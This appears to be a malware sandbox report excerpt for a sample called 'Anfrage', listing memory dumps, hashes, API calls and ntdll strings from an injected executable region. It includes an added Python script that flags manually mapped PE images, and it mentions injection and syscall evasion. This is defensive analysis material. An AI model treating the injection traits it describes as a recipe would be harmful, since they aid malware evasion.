                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                          • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                          • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                          • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059AB
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004059C3
                                                                          • CharNextA.USER32(00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059D4
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059DD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: a2c52c9a51a2c87d3959497fa160f4ebe8f2eb417ab2d749973a894cf6308a94
                                                                          • Instruction ID: a6643053d284366244d0af05be0bd1f2da836f60db037e8ed7330f0f38b612ff
                                                                          • Opcode Fuzzy Hash: a2c52c9a51a2c87d3959497fa160f4ebe8f2eb417ab2d749973a894cf6308a94
                                                                          • Instruction Fuzzy Hash: D6F06232105918EFD7029BA5DD0099FBBA8EF16360B2540BAE840F7210D674DE019BA9

                                                                          Execution Graph

                                                                          Execution Coverage: 0%
                                                                          Dynamic/Decrypted Code Coverage: 100%
                                                                          Signature Coverage: 100%
                                                                          Total number of Nodes: 1
                                                                          Total number of Limit Nodes: 0
                                                                          execution_graph 82182: 36402c70 LdrInitializeThunk

                                                                          Control-flow Graph

                                                                          control_flow_graph 1: 364035c0-364035cc LdrInitializeThunk
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9510b4aece2b1b56d77be1038b3f34e101c6b0112c848f7ccafb9754dcc61b4b
                                                                          • Instruction ID: 5b57eea4e206f03bd0e8aa0707f10495de8eb4a2775f78833c93349ded099dcf
                                                                          • Opcode Fuzzy Hash: 9510b4aece2b1b56d77be1038b3f34e101c6b0112c848f7ccafb9754dcc61b4b
                                                                          • Instruction Fuzzy Hash: 03900231A4550407D10072584514706200547E2241F65C412A142492CD87998A5565A2

                                                                          Control-flow Graph

                                                                          control_flow_graph 0: 36402c70-36402c7c LdrInitializeThunk
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: f423fae656399f9cb45038c8684b33226e26387fbfcd227e90f8a22cc2efea14
                                                                          • Instruction ID: dcda5f4ffcf6eb64b59411f2620e8cc2a07f719a36232682ff55e8b229b06389
                                                                          • Opcode Fuzzy Hash: f423fae656399f9cb45038c8684b33226e26387fbfcd227e90f8a22cc2efea14
                                                                          • Instruction Fuzzy Hash: 3D90023164148807D1107258840474A100547E2341F59C412A5424A1CD879989957121

                                                                          Control-flow Graph

                                                                          control_flow_graph 553: function 364694e0-36469d27; calls 36409020, 36404c30, 36469d2a, 3648972b, 3646dc65, 3646a808, 36468513; APIs GetPEB, RtlDebugPrintTimes (Graphviz node/edge list omitted)
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $ $0
                                                                          • API String ID: 3446177414-3352262554
                                                                          • Opcode ID: 09343b57da6040a2b6202ae1f4f24750e57257e30ea78c20d88d5b453b1cbe52
                                                                          • Instruction ID: cfa73121174061cf23e0b6e0bb35e0252726f94195da3195c78a5b507a58ebed
                                                                          • Opcode Fuzzy Hash: 09343b57da6040a2b6202ae1f4f24750e57257e30ea78c20d88d5b453b1cbe52
                                                                          • Instruction Fuzzy Hash: CB3207B1A083828FE311CF6AC884B5BFBE5BB88348F14492DF59987350D7B5D949CB52

                                                                          Control-flow Graph

                                                                          control_flow_graph 1296: function 36470274-36470760; calls 36417e54, 363b76b2, 36470766, 363bb970, 363cffb0, 36470cb5, 363b758f, 363d27f0, 364711a4, 3647dac6, 363f3bc9, 364686ba, 363efe99; APIs RtlDebugPrintTimes, GetPEB (Graphviz node/edge list omitted)
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 3446177414-1700792311
                                                                          • Opcode ID: 992744057aa3c81a21c38f4b60b19c567622ab43d5aafba5a8e839f787ae455a
                                                                          • Instruction ID: ed1b1aaa8d31dbb028ba58b8595fdeaba37e27a23674256cc3f74f175423b832
                                                                          • Opcode Fuzzy Hash: 992744057aa3c81a21c38f4b60b19c567622ab43d5aafba5a8e839f787ae455a
                                                                          • Instruction Fuzzy Hash: 4DD1EEB5D01685DFEB02CF65C850AE9BBF2FF49B14F048049E4A5AB752CB34D981CB51
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/>6$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                          • API String ID: 0-1702153194
                                                                          • Opcode ID: 51f1b8d3062664aa35ca18d7b65b4ca17076c731a850ee06d91ddebc145f4d90
                                                                          • Instruction ID: 3e03ceb0f25d751bbf851703c77104d99932dd926919e4f9ab3e5a638503015a
                                                                          • Opcode Fuzzy Hash: 51f1b8d3062664aa35ca18d7b65b4ca17076c731a850ee06d91ddebc145f4d90
                                                                          • Instruction Fuzzy Hash: A8B18DB69183559FDB11CF24C880B6BBBE8EF88754F41492EF888D7240DB74D948CB96
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                          • API String ID: 3446177414-1745908468
                                                                          • Opcode ID: 4398dd27d5f9fe378a1a6ca510c039a79b8a83303a659fb863916a9d5fe1aaff
                                                                          • Instruction ID: 747111566b04ef911f5250e9cbefe8a5e97cc42e595887d01e1ca71a98389369
                                                                          • Opcode Fuzzy Hash: 4398dd27d5f9fe378a1a6ca510c039a79b8a83303a659fb863916a9d5fe1aaff
                                                                          • Instruction Fuzzy Hash: AA91EC35D00744DFEB42DF6AC880A9DBBF2FF49318F148099E485AB761CB75A942CB51
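The dump these blocks are built from is the region at 0x36390000 in process 7. Its file name carries protection 0x40 and type 0x20000, the report marks it "based on PE: true", and the strings recovered from it (RtlAllocateHeap, RtlReAllocateHeap, HEAP[%wZ]:, the MUI registry paths) are strings that ntdll.dll itself carries. The script below is an added example, not Joe Sandbox code: it parses the .sdmp name into its fields and flags PE-shaped regions that sit in executable private memory rather than in a loader-mapped image. The field layout (process index, dump index, id, base, protection, field 6, type, field 8) is an assumption inferred from the names on this page; the PAGE_* and MEM_* constants are the real winnt.h values; SAMPLE_LINES is constructed from the two dump names in this report.

```python
"""Triage Joe Sandbox .sdmp names for manually mapped PE images (added example).

Assumed name layout, inferred from the names on this page (not documented here):
  <process index>.<dump index>.<id>.<base>.<protect>.<field6>.<type>.<field8>.sdmp
Only <protect> and <type> are decoded; the other fields are kept raw.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Memory protection constants from winnt.h
PAGE_FLAGS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
# MEMORY_BASIC_INFORMATION.Type values from winnt.h
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
MEM_TYPES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)
# The "Source File:" line as printed in the report's Memory Dump Source blocks
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+?),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.IGNORECASE
)


@dataclass
class DumpName:
    process: int      # assumed: process index within the analysis
    dump_index: int   # assumed: dump stage index
    base: int
    protect: int
    mtype: int
    raw: str

    def protection_names(self) -> List[str]:
        return [n for bit, n in PAGE_FLAGS.items() if self.protect & bit]

    def type_name(self) -> str:
        return MEM_TYPES.get(self.mtype, f"0x{self.mtype:x}")

    def is_executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)


@dataclass
class DumpSource:
    name: DumpName
    offset: int
    based_on_pe: bool


def parse_sdmp_name(name: str) -> DumpName:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    return DumpName(int(m["proc"], 16), int(m["dump"], 16), int(m["base"], 16),
                    int(m["protect"], 16), int(m["mtype"], 16), name)


def parse_source_line(line: str) -> Optional[DumpSource]:
    m = SOURCE_RE.search(line)
    if not m:
        return None
    return DumpSource(parse_sdmp_name(m["name"]), int(m["off"], 16),
                      m["pe"].lower() == "true")


def flag_manually_mapped_pe(src: DumpSource) -> bool:
    """A PE-shaped region in executable *private* memory was not placed there by
    the OS loader (that would be MEM_IMAGE): unpacked payload or a re-mapped DLL."""
    n = src.name
    return src.based_on_pe and n.is_executable() and n.mtype == MEM_PRIVATE


def triage(lines: List[str]) -> List[DumpName]:
    hits = []
    for line in lines:
        src = parse_source_line(line)
        if src and flag_manually_mapped_pe(src):
            hits.append(src.name)
    return hits


# Constructed input: the two dump names from this report, in "Source File" form.
SAMPLE_LINES = [
    "Source File: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp, Offset: 400000, based on PE: true",
    "Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true",
]

if __name__ == "__main__":
    for d in triage(SAMPLE_LINES):
        print(f"process {d.process}: PE at 0x{d.base:x} is {d.type_name()} "
              f"{'|'.join(d.protection_names())}")
```

Run against the two names above, only the 0x36390000 region is flagged: PAGE_EXECUTE_READWRITE in MEM_PRIVATE memory with a PE header, the combination to pull and inspect first when the signature list also reports direct syscalls and APC thread injection. The 0x400000 main-image dump (PAGE_READONLY, MEM_IMAGE) is loader-mapped and passes.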
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                          • API String ID: 0-3591852110
                                                                          • Opcode ID: eed2b0c417e119c19a406ca158d93065448355828e21559f943983d969fe310f
                                                                          • Instruction ID: 520ed28011e277e12019fb83eb4ffdefaf8e4e86210ad6d93184080a5fa01ecb
                                                                          • Opcode Fuzzy Hash: eed2b0c417e119c19a406ca158d93065448355828e21559f943983d969fe310f
                                                                          • Instruction Fuzzy Hash: 6D129C74E00652DFE7268F25C480BEABFF5EF09714F588459E4A68BA41DB34E881CB91
                                                                          Strings
                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 363BD0CF
                                                                          • H/>6, xrefs: 3641A843
                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 363BD196
                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 363BD262
                                                                          • @, xrefs: 363BD313
                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 363BD146
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 363BD2C3
                                                                          • @, xrefs: 363BD0FD
                                                                          • @, xrefs: 363BD2AF
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/>6$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                          • API String ID: 0-588834534
                                                                          • Opcode ID: 31952c9c28e3df361dcbe02557e445e411dbad04f3054c790e0b75bc233c65a7
                                                                          • Instruction ID: f9502fc68502ebf4e1f45d7adea8990838b765b7c9aa6c3602ce68189ca2bd78
                                                                          • Opcode Fuzzy Hash: 31952c9c28e3df361dcbe02557e445e411dbad04f3054c790e0b75bc233c65a7
                                                                          • Instruction Fuzzy Hash: 20A17BB1D083559FE711CF21C884BABBBE8BB84759F40492EE59897240D774DA48CF93
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 3446177414-3570731704
                                                                          APIs
                                                                          • RtlDebugPrintTimes.NTDLL ref: 363ED959
                                                                            • Part of subcall function 363C4859: RtlDebugPrintTimes.NTDLL ref: 363C48F7
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-1975516107
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                          • API String ID: 0-3063724069
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-523794902
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: H/>6$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                          • API String ID: 0-2039172670
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-122214566
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-4253913091
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 3643031E
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 364302BD
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 364302E7
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: This is located in the %s field of the heap header.$ -;6`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                          • API String ID: 0-966347974
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                          • API String ID: 0-3061284088
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$.mui$.mun$SystemResources\
                                                                          • API String ID: 0-3047833772
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U96
                                                                          • API String ID: 0-342388985
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\U96${
                                                                          • API String ID: 0-2340779753
                                                                          • Opcode ID: 0f5445adbe007e66e7ddda1b3adae9050ce3b2075f5455c625c80ac85137a852
                                                                          • Instruction ID: 5de96b18d93b7161e5533afb76941d73790f358a77acf42d5ff4a2db2c73df73
                                                                          • Opcode Fuzzy Hash: 0f5445adbe007e66e7ddda1b3adae9050ce3b2075f5455c625c80ac85137a852
                                                                          • Instruction Fuzzy Hash: 8391CEB5E85759CFEB12CF55C840BAE77B4EF41364F208195E802AB390D7789E84CB91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                          • API String ID: 0-2586055223
                                                                          • Opcode ID: 492586fbf0ac5f1b24439fbb962b1f4ddf8e87c95e3f867df20d508ea79f8cf0
                                                                          • Instruction ID: 52c96326b36c21ec1ff07eb53aba774ab4cf02cb0fafe549b7c72571ed199806
                                                                          • Opcode Fuzzy Hash: 492586fbf0ac5f1b24439fbb962b1f4ddf8e87c95e3f867df20d508ea79f8cf0
                                                                          • Instruction Fuzzy Hash: 4361FF7AA04380AFE712CF64CC85F67B7E8EF80754F140468E9948B691DB34E945CBA2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                          • API String ID: 0-1391187441
                                                                          • Opcode ID: 55278e555f0c01495aad4a23b29533236adbf0fd97f94248ae390961ba575c28
                                                                          • Instruction ID: 830f9701c7032e1b14442730307d507e7669bc0611030c28a370e4ad6d0eb4c2
                                                                          • Opcode Fuzzy Hash: 55278e555f0c01495aad4a23b29533236adbf0fd97f94248ae390961ba575c28
                                                                          • Instruction Fuzzy Hash: 9E31BE36A00214EFEB01CF56CC84F9ABBF8EF457A0F1440A5E814AB690DB34E980CE61
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$BuildLabEx$E?6$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                          • API String ID: 0-2866721543
                                                                          • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                          • Instruction ID: 1d2a33563d61b5f80a62b64b0a154f1256839adaf9e1d50ec2a24de280610fc0
                                                                          • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                          • Instruction Fuzzy Hash: 85317E72D00628AFEB119FA5CD44EDEBFB9EB88750F104035E914A76A0E730DA05CFA5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
